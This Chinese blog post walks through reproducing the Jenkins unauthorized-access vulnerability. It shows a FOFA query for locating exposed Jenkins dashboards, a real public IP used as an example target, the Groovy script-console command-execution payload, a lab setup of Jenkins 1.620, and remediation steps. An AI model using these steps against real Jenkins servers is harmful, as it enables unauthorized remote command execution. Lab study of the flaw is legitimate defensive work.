首页 > 其他分享 >Jenkins未授权访问漏洞

Jenkins未授权访问漏洞

时间:2024-08-04 13:53:34浏览次数:12  
标签:8080 漏洞 http 192.168 jenkins 授权 Jenkins

Jenkins未授权访问漏洞

默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。

漏洞复现

步骤一:使用以下fofa语法进行产品搜索

port="8080" && app="JENKINS" && title=="Dashboard [Jenkins]"

步骤二:在打开的URL中.点击 Manage Jenkins–>Scritp Console 在执行以下命令

#执行命令
println "whoami".execute().text  
#命令执行页面
http://125.63.109.2:8080/manage/script/index.php

实在找不到

靶场复现

环境准备

虚拟机centos IP:192.168.30.138
下载安装包,版本1.620.1.1.norach

wget http://archives.jenkins-ci.org/redhat/jenkins-1.620-1.1.noarch.rpm

在这里插入图片描述

安装Jenkins

rpm -ivh jenkins-1.620-1.1.noarch.rpm

在这里插入图片描述
启动Jenkins服务

service jenkins start

在这里插入图片描述
关闭防火墙或放行8080端口

systemctl stop firewalld.service

访问服务地址
http://192.168.30.138:8080/manage
http://192.168.30.138:8080/script
在这里插入图片描述

#执行命令
println "whoami".execute().text  

在这里插入图片描述
在这里插入图片描述

漏洞修复

  1. 升级版本。
  2. 添加认证,设置强密码复杂度及账号锁定。
  3. 禁止把Jenkins直接暴露在公网。

标签:8080,漏洞,http,192.168,jenkins,授权,Jenkins
From: https://blog.csdn.net/weixin_53736204/article/details/140903886

相关文章

  • Zookeeper未授权访问漏洞
    Zookeeper未授权访问漏洞Zookeeper是分布式协同管理工具,常用来管理系统配置信息,提供分布式协同服务。Zookeeper的默认开放端口是2181。Zookeeper安装部署之后默认情况下不需要任何身份验证,造成攻击者可以远程利用Zookeeper,通过服务器收集敏感信息或者在Zookeeper集群内进......
  • 强大的X站 七色坊+免授权+带打赏+带三级分销+已对接支付
    强大的X站七色坊+免授权+带打赏+带三级分销+已对接支付强大的X站:七色坊+免授权+带打赏+带**分销+已对接支付在数字时代的浪潮中,互联网平台如雨后春笋般涌现,其中,X站以其独特的商业模式和强大的功能集合,成为了业界的一颗璀璨明星。本文将深入探讨X站如何整合七色坊内容、免授......
  • [图文直播]Jenkins单分支流水线任务实操
    前言去年的时候,工作角色被定义为去做中台服务,虽然这个工作并不是我职业规划的主线,但正好也借此机会,去解决掉我“闭环能力”中一个暂时缺失的环节,我对自己的定位一直都是要做一个“极限单兵”,希望在地质专业软件这个相对细分的领域,做到自己能完全闭环下面的各个阶段。项目启动->......
  • 使用PasteSpider实现类似Jenkins的功能,让你的2G服务器也可以飞起
    或许你接触过Jenkins,在我理解就是拉取源码,然后构建成镜像,最后启动容器!但是这个功能对于小内存的服务器来说就是奢望了!今天介绍一个新版本,把你这个遗憾弥补下!在PasteSpider中,也是支持拉取源码,然后编译发布的!!!以下案例使用svn作为源码管理如果你使用git作为源码管理,道理差不多......
  • Nexpose v6.6.263 for Linux & Windows - 漏洞扫描
    Nexposev6.6.263forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,releaseJul31,2024请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随时了解您的风险。......
  • 致远互联FE协作办公平台 apprvaddNew.jsp SQL注入漏洞复现
    0x01产品简介致远互联FE协作办公平台是一款为企业提供全方位协同办公解决方案的产品。它集成了多个功能模块,旨在帮助企业实现高效的团队协作、信息共享和文档管理。0x02漏洞概述致远互联FE协作办公平台apprvaddNew.jsp接口处存在SQL注入漏洞,未经身份验证的攻击者可以通......
  • 赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
    0x01产品简介赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管......
  • 19. rs、deploy和Jenkins集成K8S实现CICD实战
    1.rs控制器1.作用可以实现Pod的副本控制。相比rc资源,其功能性更强且更加轻量级。2.案例1-rs实现类似rc的功能[root@master231rs]#cat01-rs-xiuxian-matchLabels.yamlapiVersion:apps/v1kind:ReplicaSetmetadata:name:rs-xiuxianspec:#指定Pod的副本数量r......
  • 漏洞扫描
    联通国际公司漏洞扫描服务产品介绍随着网络攻击事件频发,企业对于网络安全的需求日益增长。联通国际公司推出的漏洞扫描服务,旨在帮助企业及时发现并解决其内部IT资产中存在的潜在安全漏洞,从而有效降低遭受网络攻击的风险。该服务提供了高性价比的全面解决方案,支持现场或远程扫描......
  • 什么是漏洞分析?
    关注公众号网络研究观获取更多内容。在这个数字化应用不仅是一种趋势而且是一种必需品的时代,网络安全形势变得越来越复杂和严峻。随着我们越来越依赖技术,恶意行为者正在寻求更多方法来利用计算机系统、网络和软件中的漏洞。这使组织、政府和个人不断面临网络攻击的风险,这......